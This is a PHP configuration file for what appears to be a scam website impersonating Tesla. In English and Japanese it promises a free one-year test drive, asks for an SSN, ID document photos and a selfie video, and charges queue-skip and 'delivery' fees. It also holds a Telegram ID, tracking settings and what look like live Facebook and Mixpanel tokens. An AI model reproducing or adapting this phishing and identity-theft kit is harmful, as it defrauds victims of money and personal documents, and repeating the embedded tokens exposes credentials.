<?php

return array (
  'name' => '1',
  'beian' => '',
  'cdnurl' => '',
  'version' => '1.0.2',
  'timezone' => 'Asia/Shanghai',
  'forbiddenip' => '',
  'languages' => 
  array (
  ),
  'fixedpage' => 'dashboard',
  'categorytype' => 
  array (
    'default' => 'Default',
    'page' => 'Page',
    'article' => 'Article',
    'test' => 'Test',
  ),
  'configgroup' => 
  array (
    'basic' => 'Basic',
    'email' => 'Email',
    'dictionary' => 'Dictionary',
    'user' => 'User',
    'example' => 'Example',
  ),
  'mail_type' => '1',
  'mail_smtp_host' => 'smtp.qq.com',
  'mail_smtp_port' => '465',
  'mail_smtp_user' => '10000',
  'mail_smtp_pass' => 'password',
  'mail_verify_type' => '2',
  'mail_from' => '10000@qq.com',
  'attachmentcategory' => 
  array (
    'category1' => 'Category1',
    'category2' => 'Category2',
    'custom' => 'Custom',
  ),
  'langlist' => '{
  "en-US": {
    "title": "Schedule a Demo Drive",
    "test_drive_description": "Get behind the wheel for a no-pressure driving experience. Discover the vehicle, learn about the benefits of EV and get a personalized charging plan. Drivers must have a valid U.S. driver\'s license and be 18 years of age or older.",
    "vehicle_model_S": "Model S",
    "vehicle_model_3": "Model 3",
    "vehicle_model_X": "Model X",
    "vehicle_model_Y": "Model Y",
    "title_CI": "Contact Information",
    "title_FN": "First Name",
    "title_LN": "Last Name",
    "title_EA": "Email Address",
    "title_DEA": "Driver Email Address",
    "title_PN": "Phone Number",
    "title_DPN": "Driver Phone Number",
    "title_State": "State",
    "title_City": "City",
    "title_Address": "Address",
    "title_ZCode": "Zip Code ",
    "description_ZCode": "Your zip code determines which city you can pick up your test drive car",
    "promise_text": "I promise that the above information is true and valid, and I am truly applying for a test drive.",
    "title_Country": "Country or Location",
    "placeholder_Country": "Select Country or Location",
    "search_Country": "Search Country or location",
    "title_sn": "SSN",
    "title_SelectIT": "Select identification type",
    "description_SelectIT": "Select the certificate type and upload the photo of the certificate",
    "choice_IdC": "Identity card",
    "choice_DL": "Driver\'s license",
    "choice_psp": "Passport",
    "title_UploadYS": "Take a selfie video",
    "title_ChooseAP": "Choose a plan",
    "choice_pay_online": "Pay $%s to skip the queue and get test car within 15 days.",
    "choice_pay_offline": "Wait in line to apply (30-45 days get test car)",
    "video_tip": "Click to take portrait video",
    "order_confrim": "Order information confirmation",
    "brand_model": "Brand model",
    "order_info": "Order information",
    "update_info": "Update",
    "id_type": "Identification type",
    "id_info": "Identity informaiton",
    "front_of_doc": "Front of document",
    "back_of_doc": "Back of document",
    "selfie_video": "Selfie",
    "choice_pay_fee": "The paper contract delivery fee (If the application not successful, will be refund) $%s",
    "choice_pay_fee_for_eur": "The paper contract delivery fee (If the application not successful, will be refund) €%s",
    "choice_pay_fee_for_gbp": "The paper contract delivery fee (If the application not successful, will be refund) ￡%s",
    "choice_pay_fast_fee": "Application Fast track (review your application in 3 days) $%s",
    "ad_free_drive_one_year": "Free test drive for one year",
    "ad_drive_remainder_count": "Today’s remaining %s test drive",
    "test_drive_feedback": "Looking forward to your feedback after the test.",
    "test_drive_vehicle": "Four different cars for you to choose",
    "test_drive_limit": "Free test drive for one year",
    "test_drive_button_text": "Get a free Tesla test drive for one year »",
    "next_button": "Next",
    "get_your_verified": "Let\'s get your verified",
    "follow_simple_steps": "Follow the simple steps bellow",
    "get_camera_ready": "Get your camera ready",
    "take_photo_in_well_room": "Take the photo in a well lit room",
    "take_photo_tip": "We prioritize security by using advanced liveness detection that combats deepfakes.",
    "start": "Start",
    "pay_by_credit_card": "Pay by credit card",
    "share_and_invite": "Share on social media and invite friends for a test drive to speed up the review of your information!",
    "back_to_home": "Back to Home",
    "payment_success_text": "Thank you for your order! We will send an email to %email to follow up on the order status. At the same time, we will text your phone number %phone within 5 business days, please pay attention to answer it.",
    "submit_success_text": "Thank you for your submission! We will send an email to %email to follow up on the submission status. At the same time, we will text your phone number %phone within 5 business days, please pay attention to answer it.",
    "payment_failed_text": "Fail to pay! please try again later.",
    "submit_failed_text": "Fail to submit! please try again later.",
    "payment_link_tip": "Linking payment gateway partners...",
    "pay_now": "Pay Now",
    "pay_cancel": "Non-payment, canceled application"
  },
  "ja": {
    "title": "デモドライブをスケジュールする",
    "test_drive_description": "ハンドルを握って、プレッシャーのない運転体験をお楽しみください。車両を発見し、EV の利点について学び、パーソナライズされた充電プランを取得します。",
    "vehicle_model_S": "Model S",
    "vehicle_model_3": "Model 3",
    "vehicle_model_X": "Model X",
    "vehicle_model_Y": "Model Y",
    "title_CI": "連絡先",
    "title_FN": "お名前   例）東京太郎",
    "title_LN": "ふりがな   例）とうきょうたろう",
    "title_EA": "メールアドレス",
    "title_DEA": "ドライバーのメールアドレス",
    "title_PN": "電話番号",
    "title_DPN": "ドライバーの電話番号",
    "title_State": "都道府県",
    "title_Address": "市区町村",
    "title_ZCode": "郵便番号",
    "description_ZCode": "郵便番号によって、試乗車を受け取ることができる都市が決まります",
    "promise_text": "私は上記の情報が真実かつ有効であることを約束し、真に試乗を申し込みます。",
    "title_Country": "国または場所",
    "placeholder_Country": "国または場所を選択してください",
    "search_Country": "国または場所を検索する",
    "title_sn": "SSN",
    "title_SelectIT": "識別タイプを選択してください",
    "description_SelectIT": "証明書の種類を選択し、証明書の写真をアップロードします",
    "choice_IdC": "身分証明書",
    "choice_DL": "運転免許証",
    "choice_psp": "パスポート",
    "title_UploadYS": "自撮りビデオを撮る",
    "title_ChooseAP": "プランを選択してください",
    "choice_pay_online": "JP¥%s を支払うと列をスキップして 15 日以内にテスト車を入手できます。",
    "choice_pay_offline": "申し込みの列に並んで待ちます (試用車を入手するには 30 ～ 45 日かかります)",
    "video_tip": "クリックしてポートレートビデオを撮影します",
    "order_confrim": "注文情報の確認",
    "brand_model": "ブランドモデル",
    "order_info": "注文情報",
    "update_info": "アップデート",
    "id_type": "識別タイプ",
    "id_info": "アイデンティティ情報",
    "front_of_doc": "書類の前面",
    "back_of_doc": "書類の裏面",
    "selfie_video": "セルフィー",
    "choice_pay_fee": "紙契約の宅配料金(申込不合格の場合もに返金する) JP¥%s",
    "choice_pay_fee_for_eur": "紙契約の宅配料金(申込不合格の場合もに返金する) €%s",
    "choice_pay_fee_for_gbp": "紙契約の宅配料金(申込不合格の場合もに返金する) ￡%s",
    "choice_pay_fast_fee": "アプリケーションのファースト トラック (3 日以内にアプリケーションを確認します) JP¥%s",
    "ad_free_drive_one_year": "1年間無料試乗可能",
    "ad_drive_remainder_count": "本日の残り %s 台の試乗",
    "test_drive_feedback": "テスト後のフィードバックをお待ちしております",
    "test_drive_vehicle": "あなたが選択できる4つの異なる車",
    "test_drive_limit": "1年間無料試乗可能",
    "test_drive_button_text": "Tesla を 1 年間無料で試乗できます »",
    "next_button": "次のステップ",
    "get_your_verified": "認証を受けましょう",
    "follow_simple_steps": "以下の簡単な手順に従ってください",
    "get_camera_ready": "カメラを準備してください",
    "take_photo_in_well_room": "明るい部屋で写真を撮りましょう",
    "take_photo_tip": "ディープフェイクに対抗する高度な生存検出を使用することで、セキュリティを優先します。",
    "start": "始める",
    "pay_by_credit_card": "クレジットカードでのお支払い",
    "share_and_invite": "ソーシャル メディアで共有し、友人を試乗に招待すると、情報のレビューが迅速化されます。",
    "back_to_home": "家に帰る",
    "payment_success_text": "注文いただきありがとうございます！ 注文状況を追跡するために、%email に電子メールを送信します。 同時に、5 営業日以内にお客様の電話番号 %phone にテキスト メッセージを送信しますので、必ずご返信ください。",
    "submit_success_text": "ご提出いただきありがとうございます! 提出ステータスを追跡するために、%email に電子メールを送信します。 同時に、5 営業日以内にお客様の電話番号 %phone にテキスト メッセージを送信しますので、必ずご返信ください。",
    "payment_failed_text": "支払いを怠ってください！ 後でもう一度試してください。",
    "submit_failed_text": "提出に失敗しました! 後でもう一度試してください。",
    "payment_link_tip": "ペイメントゲートウェイ・パートナーとのリンク...",
    "pay_now": "ペイナウ",
    "pay_cancel": "申し込みの取り消し、未払い"
  }
}',
  'pixel' => '482925427568447',
  'analytics' => '',
  'amount' => '500',
  'tgid' => '5930595643',
  'amount_fast' => '1050',
  'mixpanelToken' => '537aaea34a704bf0c5cf954792602ae6',
  'fbqToken' => 'EAAEvghdLjUABO6bZBGgmM9vLV8J5WbZBwzotKLrYwoPUBjBIJ7EBb8wTaq61NoERJ1mY97dCvnHLZAjpVdO8h8nrZBrBVXZAHGqYmlrAzY4AutetgAGZAggbCAn7kiJNhw7m3grSOArpT0IkSS65H1TVHW8AeqcKMw631974zuPqhEPZCnZAC1f0VDhuJo5uL03P7QZDZD',
);
